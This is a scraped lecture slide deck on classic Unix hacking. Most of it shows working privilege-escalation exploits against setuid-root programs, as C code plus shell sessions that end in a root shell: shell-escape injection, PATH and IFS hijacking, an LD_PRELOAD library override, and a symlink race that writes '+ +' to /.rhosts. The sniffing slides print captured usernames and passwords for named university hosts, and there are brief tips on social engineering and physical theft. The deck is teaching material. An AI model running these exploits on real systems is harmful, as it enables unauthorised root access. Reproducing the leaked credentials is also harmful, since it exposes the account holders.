classical hacking technique
DESCRIPTION
Classical Hacking technique. Taeho Oh http://postech.edu/~ohhara [email protected]. Contents (1). Physical attack Social engineering Shell escape PATH attack IFS attack LD_PRELOAD attack Race condition. Contents (2). Buffer overflow Sniff IP Spoof Misconfiguration. - PowerPoint PPT PresentationTRANSCRIPT
![Page 2: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/2.jpg)
Contents (1)• Physical attack• Social engineering• Shell escape• PATH attack• IFS attack• LD_PRELOAD attack• Race condition
![Page 3: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/3.jpg)
Contents (2)• Buffer overflow• Sniff• IP Spoof• Misconfiguration
![Page 4: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/4.jpg)
Physical attack• Search password in admin’s desk• Steal a hard disk or a computer• Break door with a hammer
![Page 5: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/5.jpg)
Social engineering• Ask admin admin’s password• Send email, which tells to change the pa
ssword, to all users
![Page 6: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/6.jpg)
Shell escape (1)• Try to get the shell from program
by using shell escape character• Ex) ; | , ‘ “ ! % & ( ) . . .
![Page 7: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/7.jpg)
Shell escape (2)[ ohhara@ohhara ~ ] {1} $ cat ex_finger.c
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
main(int argc,char **argv)
{
char cmd[100];
setuid(0);
setgid(0);
![Page 8: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/8.jpg)
if(argc>1)
{
sprintf(cmd,"/usr/bin/finger %s",argv[1]);
system(cmd);
}
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_finger
---s--x--x 1 root root 22961 Jan 3 19:33 ex_finger*
Shell escape (3)
![Page 9: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/9.jpg)
Shell escape (4)[ ohhara@ohhara ~ ] {3} $ ./ex_finger 'bin;/bin/sh'
Login name: bin
Directory: /usr/bin
Never logged in.
Mail last read Fri Dec 31 17:50:28 1999
No Plan.
# whoami
root
#
Execute “/usr/bin/finger bin;/bin/sh”
![Page 10: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/10.jpg)
PATH attack (1)• PATH is executable program
search path• PATH can be changed by the
hacker
![Page 11: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/11.jpg)
PATH attack (2)[ ohhara@ohhara ~ ] {1} $ cat ex_who.c
#include<stdlib.h>
#include<unistd.h>
main()
{
setuid(0);
setgid(0);
system("who");
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_who
---s--s--x 1 root root 3136 Mar 6 17:29 ex_who*
![Page 12: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/12.jpg)
PATH attack (3)[ ohhara@ohhara ~ ] {3} $ cat who
#!/bin/sh
/bin/sh
[ ohhara@ohhara ~ ] {4} $ PATH=.:${PATH}
[ ohhara@ohhara ~ ] {5} $ export PATH
[ ohhara@ohhara ~ ] {6} $ ./ex_who
# whoami
root
# Execute not “/usr/bin/who”
but “./who”
![Page 13: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/13.jpg)
IFS attack (1)• IFS is Internal Field Separator• Command argument is separated by IFS
value– Default IFS value is ‘ ‘– Ex)
• ls –al -> ls -al ( IFS = ‘ ‘ )• ls/-al -> ls -al ( IFS = ‘/’ )
![Page 14: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/14.jpg)
IFS attack (2)[ ohhara@ohhara ~ ] {1} $ cat ex_date.c
#include<stdlib.h>
#include<unistd.h>
main()
{
setuid(0);
setgid(0);
system("/bin/date");
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_date
---s--x--x 1 root root 22811 Jan 3 21:19 ex_date*
![Page 15: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/15.jpg)
IFS attack (3)[ ohhara@ohhara ~ ] {3} $ cat bin
#!/bin/sh
IFS=' '
export IFS
/bin/sh
[ ohhara@ohhara ~ ] {4} $ IFS=/
[ ohhara@ohhara ~ ] {5} $ export IFS
[ ohhara@ohhara ~ ] {6} $ PATH=.:${PATH}
[ ohhara@ohhara ~ ] {7} $ export PATH
![Page 16: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/16.jpg)
IFS attack (4)[ ohhara@ohhara ~ ] {8} $ ./ex_date
# whoami
root
#
Execute not “/bin/date”but “bin date”
![Page 17: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/17.jpg)
LD_PRELOAD attack (1)• LD_LIBRARY_PATH is dynamic link
library path• LD_PRELOAD is dynamic link
library path which is loaded before LD_LIBRARY_PATH is loaded
![Page 18: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/18.jpg)
LD_PRELOAD attack (2)[ ohhara@ohhara ~ ] {1} $ cat ex_print.c
#include<stdio.h>
#include<unistd.h>
main()
{
setuid(0);
setgid(0);
printf("hello!\n");
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_print
---s--x--x 1 root root 4290 Jan 3 21:48 ex_print*
![Page 19: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/19.jpg)
LD_PRELOAD attack (3)[ ohhara@ohhara ~ ] {3} $ cat ex_print_so.c
void printf(char *str)
{
execl("/bin/sh","sh",0);
}
[ ohhara@ohhara ~ ] {4} $ gcc –shared –o ex_print_so.so ex_print_so.c
[ ohhara@ohhara ~ ] {5} $ LD_PRELOAD=./ex_print_so.so
[ ohhara@ohhara ~ ] {6} $ export LD_PRELOAD
![Page 20: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/20.jpg)
LD_PRELOAD attack (4)[ ohhara@ohhara ~ ] {7} $ ./ex_print
# whoami
root
#
![Page 21: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/21.jpg)
Race condition (1)• Race condition is occurred when
two or more processes try to use one resource
• Race condition of UNIX security is occurred in the file system.
![Page 22: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/22.jpg)
Race condition (2)
Normal process
Attack process
access(“good”,W_OK)
Remove “good”
Link “good” to “/.rhosts”
Open(“good”,O_WRONLY)
Write to not “good” but “/.rhosts”
![Page 23: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/23.jpg)
Race condition (3)[ ohhara@ohhara ~ ] {1} $ cat ex_race.c
#include<stdio.h>
#include<unistd.h>
#include<fcntl.h>
main()
{
int fd;
char *data="+ +\n";
setuid(0);
setgid(0);
![Page 24: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/24.jpg)
Race condition (4)if(access("good",W_OK)==0)
{
sleep(3);
fd=open("good",O_WRONLY|O_TRUNC|O_CREAT);
write(fd,data,4);
close(fd);
}
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_race
---s--x--x 1 root root 4728 Jan 4 13:23 ex_race*
![Page 25: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/25.jpg)
Race condition (5)[ ohhara@ohhara ~ ] {3} $ ls –l /.rhosts
ls: /.rhosts: No such file or directory
[ ohhara@ohhara ~ ] {4} $ touch good
[ ohhara@ohhara ~ ] {5} $ ./ex_race & ; ln -sf /.rhosts good
[ ohhara@ohhara ~ ] {6} $ cat /.rhosts
+ +
[ ohhara@ohhara ~ ] {7} $ rlogin –l root localhost
# whoami
root
#
![Page 26: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/26.jpg)
Buffer overflow (1)• Write unexpected memory area by
overflowing buffer• The most famous hacking technique• Almost all cases, buffer overflow
means stack buffer overflow– Recently, heap buffer overflow attack
is introduced
![Page 27: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/27.jpg)
Buffer overflow (2)• Hackers can execute arbitrary
command by overflowing buffer• Machine and OS dependent
hacking technique• This topic will be discussed later
![Page 28: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/28.jpg)
Sniff (1) • Ethernet broadcasts to transmit data• Hackers can see all network packets in t
he ethernet– Network packets contains user id, passwor
d, and other useful information• The Easiest and the most powerful hacki
ng technique
![Page 29: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/29.jpg)
Sniff (2)
Normalnetwork packet
Broadcastednetwork packet
Hacker can seenetwork packet
![Page 30: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/30.jpg)
Sniff (3)# whoami
root
# hostname
gdt.postech.ac.kr
![Page 31: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/31.jpg)
Sniff (4)# cat tcp.log
cogs.postech.ac.kr => mx1.postech.ac.kr [110]
USER nllbut
PASS cj+]PpS!
UIDL
STAT
QUIT
----- [FIN]
![Page 32: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/32.jpg)
Sniff (5)211.33.152.182 => monsky.postech.ac.kr [23]
#'$vt100!ohhara
zXfYpZgAd/!
-----+ [Timed Out]+
#
![Page 33: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/33.jpg)
IP spoof• Hackers can spoof their IP address• Hackers try to connect to rsh, rlogin serv
ices with spoofed IP address• Hackers have to know the next sequenc
e number to open TCP session with spoofed IP address
• This topic will be discussed later
![Page 34: Classical Hacking technique](https://reader036.vdocument.in/reader036/viewer/2022062310/56815c2a550346895dca005f/html5/thumbnails/34.jpg)
Misconfiguration
• Hackers search for admin’s mistake– Ex)
• Null/simple password account• Everyone nfs export• Writable ftp home directory• Opened x window display